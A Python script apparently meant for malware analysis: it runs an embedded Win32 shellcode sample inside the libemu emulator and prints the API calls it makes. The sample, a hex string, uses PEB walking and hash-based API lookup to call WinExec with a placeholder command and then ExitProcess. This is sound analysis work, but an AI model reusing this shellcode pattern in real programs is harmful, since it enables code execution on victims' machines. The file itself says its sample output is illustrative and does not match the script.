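from __future__ import print_function

import binascii
import os
import struct
import sys

import pylibemu

# Analysis harness: run a small Win32 shellcode sample inside libemu and print
# the Win32 API-call profile that libemu records.  The shellcode only ever
# executes in the emulator, never on the host.
#
# Usage: python this_script.py [path/to/shellcode.bin]
# With no argument the embedded sample below is emulated.

emu = pylibemu.Emulator()

# The embedded sample reads its WinExec command line from CMDLINE_ADDR and its
# ExitProcess exit code from EXITCODE_ADDR; change the values written here to
# see a different emu_profile_output.
CMDLINE_ADDR = 0x41414243
EXITCODE_ADDR = 0x41414143
emu.memory_write_dword(CMDLINE_ADDR, 0x41414141)   # the bytes "AAAA"
emu.memory_write_dword(EXITCODE_ADDR, 0x00000021)

# Built-in sample: calls WinExec and then ExitProcess (see the expected
# profile output at the bottom of the file).
SAMPLE_HEX = 'eb6b566a3059648b018b400c8b701cad8b40085ec3608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c35fe899ffffff89c3eb05e8f1ffffff6898fe8a0e53e898ffffff41516843424141ffd0687ed8e27353e884ffffff31d28b8a4341414151ffd0'

if len(sys.argv) > 1:
    # Raw shellcode bytes from a file; the context manager closes the handle.
    with open(sys.argv[1], 'rb') as fh:
        b = fh.read()
else:
    # unhexlify works on both Python 2 and 3 (str.decode('hex') is 2-only).
    b = binascii.unhexlify(SAMPLE_HEX)

MEM_OFFSET = 0x401000
# ESP is pointed at MEM_OFFSET below, so the dword stored here is what the
# entry stub's 'ret' pops: the address just past it, where the shellcode is.
emu.memory_write_dword(MEM_OFFSET, MEM_OFFSET + 4)

# Copy the shellcode into emulator memory one dword at a time.  '<I' pins
# little-endian decoding for the x86 target instead of relying on the host's
# native byte order; the last chunk is zero-padded to a full dword.
for off in range(0, len(b), 4):
    chunk = b[off:off + 4].ljust(4, b'\x00')
    emu.memory_write_dword(MEM_OFFSET + 4 + off, struct.unpack('<I', chunk)[0])

# Entry stub at offset 0: c3 is 'ret' (pops MEM_OFFSET + 4 and jumps to the
# shellcode), the 90s are nop padding.
emu.prepare(b'\xc3\x90\x90\x90', 0)

# Stack pointer at the prepared return address.
emu.cpu_reg32_set(pylibemu.EMU_REGS.esp, MEM_OFFSET)

emu.test()

print('EMU PROFILE OUTPUT:')
print(emu.emu_profile_output)

# Output should look like (as recorded by the original author; note that the
# uExitCode shown does not equal the 0x21 written to EXITCODE_ADDR above, so
# treat this listing as illustrative and confirm against your libemu build):
#EMU PROFILE OUTPUT:
#UINT WINAPI WinExec (
#     LPCSTR = 0x01c5cdb0 =>
#           = "AAAA";
#     UINT uCmdShow = 49;
#) =  32;
#void ExitProcess (
#     UINT uExitCode = 2088763392;
#) =  0;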